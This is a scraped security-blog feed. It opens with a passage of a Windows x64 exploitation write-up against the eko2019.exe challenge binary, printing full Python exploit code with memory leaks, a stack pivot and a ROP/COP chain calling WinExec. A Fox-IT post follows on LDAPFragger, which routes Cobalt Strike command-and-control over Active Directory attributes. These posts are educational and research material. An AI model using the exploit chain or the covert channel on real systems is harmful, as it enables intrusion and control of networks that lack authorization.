print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

We hit our NOP and then execute it, sliding into our intended instruction.

We execute the above instruction- and we see a virtual address has been loaded into RAX! This is presumably the base address of eko2019.exe.

To verify this, let’s check what the base address of eko2019.exe is in WinDbg.

Awesome! We have successfully extracted the base virtual address of eko2019.exe and stored it in a variable on the remote client.

This means now, that when we need to execute our code in the future- we can dynamically resolve our ROP gadgets via offsets- and ASLR will no longer be a problem! The only question remains- how are we going to execute any code?

Mom, The Application Is Still Leaking!

For this blog post, we are going to pop calc.exe to verify code execution is possible. Since we are going to execute calc.exe as our proof of concept, using the Windows API function WinExec() makes the most sense to us. This is much easier than going through with a full VirtualProtect() function call, to make our code executable- since all we will need to do is pop calc.exe.

Since we already have the ability to dynamically resolve all of eko2019.exe’s virtual address space- let’s see if we can find any addresses within eko2019.exe that leak a pointer to kernel32.dll (where WinExec() resides) or WinExec() itself.

As you can see below, eko2019.exe+0x9010 actually leaks a pointer to WinExec()!

This is perfect, due to the fact we have a read primitive which extracts the value that a virtual address points to! In this case, eko2019.exe+0x9010 points to WinExec(). Again, we don’t need to push rcx or access any special registers like the GS segment register- we just want to extract the pointer in RCX (which we will fill with eko2019.exe+0x9010). Let’s update our proof of concept with a fourth request, to leak the address of WinExec() in kernel32.dll.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 3rd stage

# 16 total bytes
print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_3)

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection
s.close()

Landing on the move instruction, we can see that the address of WinExec() is about to be extracted from RCX!

When this instruction executes, the value will be loaded into RAX and then returned to us (the client)!

Do What You Can, With What You Have, Where You Are- Teddy Roosevelt

Recall up until this point, we have the following primitives:

  1. Write primitive- we can control the value of RCX, one byte around our mov instruction, and we can control a lot of the stack.
  2. Read primitive- we have the ability to read in values of pointers.

Using our ability to control RCX, we may have a potential way to pivot back to the stack. If you can recall from earlier, when we first increased our number of bytes from 512 to 528 and the \x41 byte was accessed BEFORE the mov rax, qword ptr [rcx] instruction was executed (which resulted in an access violation and a subsequent crash), the disassembler didn’t interpret \x41 as part of the mov rax, qword ptr [rcx] instruction set- because that opcode doesn’t create a valid set of opcodes with said move instruction.

Investigating a little bit more, we can recall that our move instruction also ends with a ret, which will take the value located at RSP (the stack), and execute it. Since we can control RCX- if we could find a way to load RCX into RSP, we would return to that value and execute it, via the ret that exits the function call. What would make sense to us, is to load RCX with a ROP gadget that would add rsp, X (which would make RSP point into our user controlled portion of the stack) and then start executing there! The question still remains however- even though we can control RCX, how are we going to execute what is in it?

After some trial and error, I finally came to a pretty neat conclusion! We can load RCX with the address of our stack pivot ROP gadget. We can then replace the \x41 byte from earlier (we changed this byte to \x65 in the PEB portion of this exploit) with a \x51 byte!

The \x51 byte is the opcode that corresponds to the push rcx instruction! Pushing RCX will allow us to place our user controlled value of RCX onto the stack (which is a stack pivot ROP gadget). Pushing an item on the stack, will actually load said item into RSP! This means that we can load our own ROP gadget into RSP, and then execute the ret instruction to leave the function- which will execute our ROP gadget! The first step for us, is to find a ROP gadget! We will use rp++ to enumerate all ROP gadgets from eko2019.exe.

After running rp++, we find an ideal ROP gadget that will perform the stack pivot.

This gadget will raise the stack up in value, to load our user controlled values into RSP and subsequent bytes after RSP! Notice how each gadget does not show the full virtual address of the pointer. This is because of ASLR! If we look at the last 4 or so bytes, we can see that this is actually the offset from the base virtual address of eko2019.exe to said pointer. In this case, the ROP gadget we are going after is located at eko2019.exe + 0x158b.

Let’s update our proof of concept with the stack pivot implemented.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 3rd stage

print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_3)

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection
s.close()

# 4th stage

# 16 total bytes
print "[+] Sending the fourth header..."
exploit_4 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_4 += "\x41" * 512

# push rcx (which we control)
exploit_4 += "\x51"

# Padding to load eko2019.exe+0x158b
exploit_4 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_4 += struct.pack('<Q', base_address+0x158b)

# Message needs to be 528 bytes total
exploit_4 += "\x41" * (544-len(exploit_4))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_4)

print "[+] Pivoted to the stack!"

# Don't need to index any data back through our read primitive, as we just want to stack pivot here
# Receiving data back from a connection is always best practice
s.recv(1024)

# Close the connection
s.close()

After executing the updated proof of concept, we continue execution to our move instruction as always. This time, we land on our intended push rcx instruction after executing the first two requests!

In addition, we can see RCX contains our specified ROP gadget!

After stepping through the push rcx instruction, we can see our ROP gadget gets loaded into RSP!

The next move instruction doesn’t matter to us at this point- as we are only worried about returning to the stack.

After we execute our ret to exit this function, we can clearly see that we have returned into our specified ROP gadget!

After we add to the value of RSP, we can see that when this ROP gadget returns- it will return into a region of memory that we control on the stack. We can view this via the Call stack in WinDbg.

Now that we have been able to successfully pivot back to the stack, it is time to attempt to pop calc.exe. Let’s start executing some useful ROP gadgets!

Recall that since we are working with the x64 architecture, we have to adhere to the __fastcall calling convention. As mentioned before, the registers we will use are:

  1. RCX -> First argument
  2. RDX -> Second argument
  3. R8 -> Third argument
  4. R9 -> Fourth argument
  5. RSP + 0x20 -> Fifth argument
  6. RSP + 0x28 -> Sixth argument
  7. etc.

A call to WinExec() is broken down as such, according to its documentation.

UINT WinExec(
  LPCSTR lpCmdLine,
  UINT   uCmdShow
);

This means that all we need to do, is place a value in RCX and RDX- as this function only takes two arguments.

Since we want to pop calc.exe, the first argument in this function should be a POINTER to an address that contains the string “calc”, which should be null terminated. This should be stored in RCX. lpCmdLine (the argument we are fulfilling) is the name of the application we would like to execute. Remember, this should be a pointer to the string.

The second argument, stored in RDX, is uCmdShow. These are the “display options”. The easiest option here, is to use SW_SHOWNORMAL- which just executes and displays the application normally. This means we will just need to place the value 0x1 into RDX, which is representative of SH_SHOWNORMAL.

Note- you can find all of these ROP gadgets from running rp++.

To start our ROP chain, we will just implement a “ROP NOP”, which will just return to the stack. This gadget is located at eko2019.exe+0x10a1

exploit_4 += struct.pack('<Q', base_address+0x10a1)			# ret: eko2019.exe

The next thing we would like to do, is get a pointer to the string “calc” into RCX. In order to do this, we are going to need to have write permissions to a memory address. Then, using a ROP gadget, we can overwrite what this address points to with our own value of “calc”, which is null terminated. Looking in IDA, we see only one of the sections that make up our executable has write permissions.

This means that we need to pick an address from the .data section within eko2019.exe to overwrite. The address we will use is eko2019.exe+0xC288- as it is the first available “blank” address.

We will place this address into RCX, via the following ROP/COP gadgets:

exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe

In this program, there was only one ROP gadget that allowed us to control RCX in the manner we wished- which was mov rcx, rax ; call r12. Obviously, this gadget will not return to the stack like a ROP gadget- but it will call a register afterwards. This is what is known as “Call-Oriented Programming”, or COP. You may be asking “this address will not return to the stack- how will we keep executing”? There is an explanation for this!

Essentially, before we use the COP gadget, we can pop a ROP gadget into the register that will be called (e.g. R12 in this case). Then, when the COP gadget is executed and the register is called- it will be actually peforming a call to a ROP gadget we specify- which will be a return back to the stack in this case, via an add rsp, X instruction. Here is how this looks in totality.

# The next gadget is a COP gadget that does not return, but calls r12
# Placing an add rsp, 0x10 gadget to act as a "return" to the stack into r12
exploit_4 += struct.pack('<Q', base_address+0x4a8e)			# pop r12 ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0x8789)			# add rsp, 0x10 ; ret: eko2019.exe 

# Grabbing a blank address in eko2019.exe to write our calc string to and create a pointer (COP gadget)
# The blank address should come from the .data section, as IDA has shown this the only segment of the executable that is writeable
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe
exploit_4 += struct.pack('<Q', 0x4141414141414141)			# Padding from add rsp, 0x10

Great! This sequence will load a writeable address into the RCX register. The task now, is to somehow overwrite what this address is pointing to.

We stumble across another interesting ROP gadget that can help us achieve this goal!

mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret

This ROP gadget is from kernel32.dll. As you can recall, WinExec() is exported by kernel32.dll. This means we already have a valid address within kernel32.dll. Knowing this, we can find the distance between WinExec() and the base of kernel32.dll- which would allow us to dynamically resolve the base virtual address of kernel32.dll.

kernel32_base = kernel32_winexec-0x5e390

WinExec() is 0x5e390 bytes into kernel32.dll (on this version of Windows 10). Subtracting this value, will give us the base adddress of kernel32.dll! Now that we have resolved the base, this will allow us to calculate the offset and virtual memory address of our gadget in kernel32.dll dynamically.

Looking back at our ROP gadget- this gives us the ability to take the value in RAX and move it into the value POINTED TO by RCX. RCX already contains the address we would like to overwrite- so this is a perfect match! All we need to do now, is load the string “calc” (null terminated) into RAX! Here is what this looks like all put together.

# Creating a pointer to calc string
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += "calc\x00\x00\x00\x00"					# calc (with null terminator)
exploit_4 += struct.pack('<Q', kernel32_base+0x6130f)		        # mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret: kernel32.dll

# Padding for add rsp, 0x0000000000000080 and pop rbx
exploit_4 += "\x41" * 0x88

One things to keep in mind is that the ROP gadget that creates the pointer to “calc” (null terminated) has a few extra instructions on the end that we needed to compensate for.

The second parameter is much more straight forward. In kernel32.dll, we found another gadget that allows us to pop our own value into RDX.

# Placing second parameter into rdx
exploit_4 += struct.pack('<Q', kernel32_base+0x19daa)		# pop rdx ; add eax, 0x15FF0006 ; ret: kernel32.dll
exploit_4 += struct.pack('<Q', 0x01)			        # SH_SHOWNORMAL

Perfect! At this point, all we need to do is place the call to WinExec() on the stack! This is done with the following snippet of code.

# Calling kernel32!WinExec
exploit_4 += struct.pack('<Q', base_address+0x10a1)		# ret: eko2019.exe (ROP NOP)
exploit_4 += struct.pack('<Q', kernel32_winexec)	        # Address of kernel32!WinExec

In addition, we need to return to a valid address on the stack after the call to WinExec() so our prgram doesn’t crash after calc.exe is called. This is outlined below.

exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x2e71)			# add rsp, 0x38 ; ret: eko2019.exe

The final exploit code can be found here on my GitHub.

Let’s step through this final exploit in WinDbg to see how things break down.

We have already shown that our stack pivot was successful. After the pivot back to the stack and our ROP NOP which just returns back to the stack is executed, we can see that our pop r12 instruction has been hit. This will load a ROP gadget into R12 that will return to the stack- due to the fact our main ROP gadget calls R12, as explained earlier.

After we step through the instruction, we can see our ROP gadget for returning back to the stack has been loaded into R12.

We hit our next gadget, which pops the writeable address in the .data section of eko2019.exe into RAX. This value will be eventually placed into the RCX register- where the first function argument for WinExec() needs to be.

RAX now contains the blank, writeable address in the .data section.

After this gadget returns, we hit our main gadget of mov rcx, rax ; call r12.

The value of RAX is then placed into RCX. After this occurs, we can see that R12 is called and is going to execute our return back to the stack, add rsp, 0x10 ; ret.

Perfect! Our COP gadget and ROP gadgets worked together to load our intended address into RCX.

Next, we execute on our next pop rax gadget, which loads the value of “calc” into RAX (null terminated). 636c6163 = clac in hex to text. This is because we are compensating for the endianness of our processor (little endian).

We land on our most important ROP gadget to date after the return from the above gadget. This will take the string “calc” (null terminated) and point the address in RCX to it.

The address in RCX now points to the null terminated string “calc”.

Perfect! All we have to do now, is pop 0x1 into RDX- which has been completed by the subsequent ROP gadget.

Perfect! We have now landed on the call to WinExec()- and we can execute our shellcode!

All that is left to do now, is let everything run as intended!

Let’s run the final exploit.

Calc.exe FTW!

Big shoutout to Blue Frost Security for this binary- this was a very challenging experience and I feel I learned a lot from it. A big shout out as well to my friend @trickster012 for helping me with some of the problems I was having with __fastcall initially. Please contact me with any comments, questions, or corrections.

Peace, love, and positivity :-)

SLAE – Assignment #5: Metasploit Shellcode Analysis

By: voidsec
26 March 2020 at 13:52

Assignment #5: Metasploit Shellcode Analysis Fifth SLAE’s assignment requires to dissect and analyse three different Linux x86 Metasploit Payload. Metasploit currently has 35 different payloads but almost half of it are Meterpreter version, thus meaning staged payloads. I’ve then decided to skip meterpreter payloads as they involve multiple stages and higher complexity that will break […]

The post SLAE – Assignment #5: Metasploit Shellcode Analysis appeared first on VoidSec.

LDAPFragger: Command and Control over LDAP attributes

19 March 2020 at 10:15

Written by Rindert Kramer

Introduction

A while back during a penetration test of an internal network, we encountered physically segmented networks. These networks contained workstations joined to the same Active Directory domain, however only one network segment could connect to the internet. To control workstations in both segments remotely with Cobalt Strike, we built a tool that uses the shared Active Directory component to build a communication channel. For this, it uses the LDAP protocol which is commonly used to manage Active Directory, effectively routing beacon data over LDAP. This blogpost will go into detail about the development process, how the tool works and provides mitigation advice.

Scenario

A couple of months ago, we did a network penetration test at one of our clients. This client had multiple networks that were completely firewalled, so there was no direct connection possible between these network segments. Because of cost/workload efficiency reasons, the client chose to use the same Active Directory domain between those network segments. This is what it looked like from a high-level overview.

1

We had physical access on workstations in both segment A and segment B. In this example, workstations in segment A were able to reach the internet, while workstations in segment B could not. While we did have physical access on workstation in both network segments, we wanted to control workstations in network segment B from the internet.

Active Directory as a shared component

Both network segments were able to connect to domain controllers in the same domain and could interact with objects, authenticate users, query information and more. In Active Directory, user accounts are objects to which extra information can be added. This information is stored in attributes. By default, user accounts have write permissions on some of these attributes. For example, users can update personal information such as telephone numbers or office locations for their own account. No special privileges are needed for this, since this information is writable for the identity SELF, which is the account itself. This is configured in the Active Directory schema, as can be seen in the screenshot below.

2

Personal information, such as a telephone number or street address, is by default readable for every authenticated user in the forest. Below is a screenshot that displays the permissions for public information for the Authenticated Users identity.

3

The permissions set in the screenshot above provide access to the attributes defined in the Personal-Information property set. This property set contains 40+ attributes that users can read from and write to. The complete list of attributes can be found in the following article: https://docs.microsoft.com/en-us/windows/win32/adschema/r-personal-information
By default, every user that has successfully been authenticated within the same forest is an ‘authenticated user’. This means we can use Active Directory as a temporary data store and exchange data between the two isolated networks by writing the data to these attributes and then reading the data from the other segment.
If we have access to a user account, we can use that user account in both network segments simultaneously to exchange data over Active Directory. This will work, regardless of the security settings of the workstation, since the account will communicate directly to the domain controller instead of the workstation.

To route data over LDAP we need to get code execution privileges first on workstations in both segments. To achieve this, however, is up to the reader and beyond the scope of this blogpost.
To route data over LDAP, we would write data into one of the attributes and read the data from the other network segment.
In a typical scenario where we want to execute ipconfigon a workstation in network Segment B from a workstation in network Segment A, we would write the ipconfig command into an attribute, read the ipconfig command from network segment B, execute the command and write the results back into the attribute.

This process is visualized in the following overview:

4

A sample script to utilize this can be found on our GitHub page: https://github.com/fox-it/LDAPFragger/blob/master/LDAPChannel.ps1

While this works in practice to communicate between segmented networks over Active Directory, this solution is not ideal. For example, this channel depends on the replication of data between domain controllers. If you write a message to domain controller A, but read the message from domain controller B, you might have to wait for the domain controllers to replicate in order to get the data. In addition, in the example above we used to info-attribute to exchange data over Active Directory. This attribute can hold up to 1024 bytes of information. But what if the payload exceeds that size? More issues like these made this solution not an ideal one.

Lastly, people already built some proof of concepts doing the exact same thing. Harmj0y wrote an excellent blogpost about this technique: https://www.harmj0y.net/blog/powershell/command-and-control-using-active-directory/

That is why we decided to build an advanced LDAP communication channel that fixes these issues.

Building an advanced LDAP channel

In the example above, the info-attribute is used. This is not an ideal solution, because what if the attribute already contains data or if the data ends up in a GUI somewhere?

To find other attributes, all attributes from the Active Directory schema are queried and:

  • Checked if the attribute contains data;
  • If the user has write permissions on it;
  • If the contents can be cleared.

If this all checks out, the name and the maximum length of the attribute is stored in an array for later usage.

Visually, the process flow would look like this:

5

As for (payload) data not ending up somewhere in a GUI such as an address book, we did not find a reliable way to detect whether an attribute ends up in a GUI or not, so attributes such as telephoneNumber are added to an in-code blacklist. For now, the attribute with the highest maximum length is selected from the array with suitable attributes, for speed and efficiency purposes. We refer to this attribute as the ‘data-attribute’ for the rest of this blogpost.

Sharing the attribute name
Now that we selected the data-attribute, we need to find a way to share the name of this attribute from the sending network segment to the receiving side. As we want the LDAP channel to be as stealthy as possible, we did not want to share the name of the chosen attribute directly.

In order to overcome this hurdle we decided to use hashing. As mentioned, all attributes were queried in order to select a suitable attribute to exchange data over LDAP. These attributes are stored in a hashtable, together with the CRC representation of the attribute name. If this is done in both network segments, we can share the hash instead of the attribute name, since the hash will resolve to the actual name of the attribute, regardless where the tool is used in the domain.

Avoiding replication issues
Chances are that the transfer rate of the LDAP channel is higher than the replication occurrence between domain controllers. The easy fix for this is to communicate to the same domain controller.
That means that one of the clients has to select a domain controller and communicate the name of the domain controller to the other client over LDAP.

The way this is done is the same as with sharing the name of the data-attribute. When the tool is started, all domain controllers are queried and stored in a hashtable, together with the CRC representation of the fully qualified domain name (FQDN) of the domain controller. The hash of the domain controller that has been selected is shared with the other client and resolved to the actual FQDN of the domain controller.

Initially sharing data
We now have an attribute to exchange data, we can share the name of the attribute in an obfuscated way and we can avoid replication issues by communicating to the same domain controller. All this information needs to be shared before communication can take place.
Obviously, we cannot share this information if the attribute to exchange data with has not been communicated yet (sort of a chicken-egg problem).

The solution for this is to make use of some old attributes that can act as a placeholder. For the tool, we chose to make use of one the following attributes:

  • primaryInternationalISDNNumber;
  • otherFacsimileTelephoneNumber;
  • primaryTelexNumber.

These attributes are part of the Personal-Information property set, and have been part of that since Windows 2000 Server. One of these attributes is selected at random to store the initial data.
We figured that the chance that people will actually use these attributes are low, but time will tell if that is really the case 😉

Message feedback
If we send a message over LDAP, we do not know if the message has been received correctly and if the integrity has been maintained during the transmission. To know if a message has been received correctly, another attribute will be selected – in the exact same way as the data-attribute – that is used to exchange information regarding that message. In this attribute, a CRC checksum is stored and used to verify if the correct message has been received.

In order to send a message between the two clients – Alice and Bob –, Alice would first calculate the CRC value of the message that she is about to send herself, before she sends it over to Bob over LDAP. After she sent it to Bob, Alice will monitor Bob’s CRC attribute to see if it contains data. If it contains data, Alice will verify whether the data matches the CRC value that she calculated herself. If that is a match, Alice will know that the message has been received correctly.
If it does not match, Alice will wait up until 1 second in 100 millisecond intervals for Bob to post the correct CRC value.

6

The process on the receiving end is much simpler. After a new message has been received, the CRC is calculated and written to the CRC attribute after which the message will be processed.

7

Fragmentation
Another challenge that we needed to overcome is that the maximum length of the attribute will probably be smaller than the length of the message that is going to be sent over LDAP. Therefore, messages that exceed the maximum length of the attribute need to be fragmented.
The message itself contains the actual data, number of parts and a message ID for tracking purposes. This is encoded into a base64 string, which will add an additional 33% overhead.
The message is then fragmented into fragments that would fit into the attribute, but for that we need to know how much information we can store into said attribute.
Every attribute has a different maximum length, which can be looked up in the Active Directory schema. The screenshot below displays the maximum length of the info-attribute, which is 1024.

8

At the start of the tool, attribute information such as the name and the maximum length of the attribute is saved. The maximum length of the attribute is used to fragment messages into the correct size, which will fit into the attribute. If the maximum length of the data-attribute is 1024 bytes, a message of 1536 will be fragmented into a message of 1024 bytes and a message of 512 bytes.
After all fragments have been received, the fragments are put back into the original message. By also using CRC, we can send big files over LDAP. Depending on the maximum length of the data-attribute that has been selected, the transfer speed of the channel can be either slow or okay.

Autodiscover
The working of the LDAP channel depends on (user) accounts. Preferably, accounts should not be statically configured, so we needed a way for clients both finding each other independently.
Our ultimate goal was to route a Cobalt Strike beacon over LDAP. Cobalt Strike has an experimental C2 interface that can be used to create your own transport channel. The external C2 server will create a DLL injectable payload upon request, which can be injected into a process, which will start a named pipe server. The name of the pipe as well as the architecture can be configured. More information about this can be read at the following location: https://www.cobaltstrike.com/help-externalc2

Until now, we have gathered the following information:

  • 8 bytes – Hash of data-attribute
  • 8 bytes – Hash of CRC-attribute
  • 8 bytes – Hash of domain controller FQDN

Since the name of the pipe as well as the architecture are configurable, we need more information:

  • 8 bytes – Hash of the system architecture
  • 8 bytes – Pipe name

The hash of the system architecture is collected in the same way as the data, CRC and domain controller attribute. The name of the pipe is a randomized string of eight characters. All this information is concatenated into a string and posted into one of the placeholder attributes that we defined earlier:

  • primaryInternationalISDNNumber;
  • otherFacsimileTelephoneNumber;
  • primaryTelexNumber.

The tool will query the Active Directory domain for accounts where one of each of these attributes contains data. If found and parsed successfully, both clients have found each other but also know which domain controller is used in the process, which attribute will contain the data, which attribute will contain the CRC checksums of the data that was received but also the additional parameters to create a payload with Cobalt Strike’s external C2 listener. After this process, the information is removed from the placeholder attribute.
Until now, we have not made a distinction between clients. In order to make use of Cobalt Strike, you need a workstation that is allowed to create outbound connections. This workstation can be used to act as an implant to route the traffic over LDAP to another workstation that is not allowed to create outbound connections. Visually, it would something like this.

9

Let us say that we have our tool running in segment A and segment B – Alice and Bob. All information that is needed to communicate over LDAP and to generate a payload with Cobalt Strike is already shared between Alice and Bob. Alice will forward this information to Cobalt Strike and will receive a custom payload that she will transfer to Bob over LDAP. After Bob has received the payload, Bob will start a new suspended child process and injects the payload into this process, after which the named pipe server will start. Bob now connects to the named pipe server, and sends all data from the pipe server over LDAP to Alice, which on her turn will forward it to Cobalt Strike. Data from Cobalt Strike is sent to Alice, which she will forward to Bob over LDAP, and this process will continue until the named pipe server is terminated or one of the systems becomes unavailable for whatever reason. To visualize this in a nice process flow, we used the excellent format provided in the external C2 specification document.

10

After a new SMB beacon has been spawned in Cobalt Strike, you can interact with it just as you would normally do. For example, you can run MimiKatz to dump credentials, browse the local hard drive or start a VNC stream.
The tool has been made open source. The source code can be found here: https://github.com/fox-it/LDAPFragger

11

The tool is easy to use: Specifying the cshost and csport parameter will result in the tool acting as the proxy that will route data from and to Cobalt Strike. Specifying AD credentials is not necessary if integrated AD authentication is used. More information can be found on the Github page. Please do note that the default Cobalt Strike payload will get caught by modern AVs. Bypassing AVs is beyond the scope of this blogpost.

Why a C2 LDAP channel?

This solution is ideal in a situation where network segments are completely segmented and firewalled but still share the same Active Directory domain. With this channel, you can still create a reliable backdoor channel to parts of the internal network that are otherwise unreachable for other networks, if you manage to get code execution privileges on systems in those networks. Depending on the chosen attribute, speeds can be okay but still inferior to the good old reverse HTTPS channel. Furthermore, no special privileges are needed and it is hard to detect.

Remediation

In order to detect an LDAP channel like this, it would be necessary to have a baseline identified first. That means that you need to know how much traffic is considered normal, the type of traffic, et cetera. After this information has been identified, then you can filter out the anomalies, such as:

Monitor the usage of the three static placeholders mentioned earlier in this blogpost might seem like a good tactic as well, however, that would be symptom-based prevention as it is easy for an attacker to use different attributes, rendering that remediation tactic ineffective if attackers change the attributes.

SLAE – Assignment #4: Custom shellcode encoder

By: voidsec
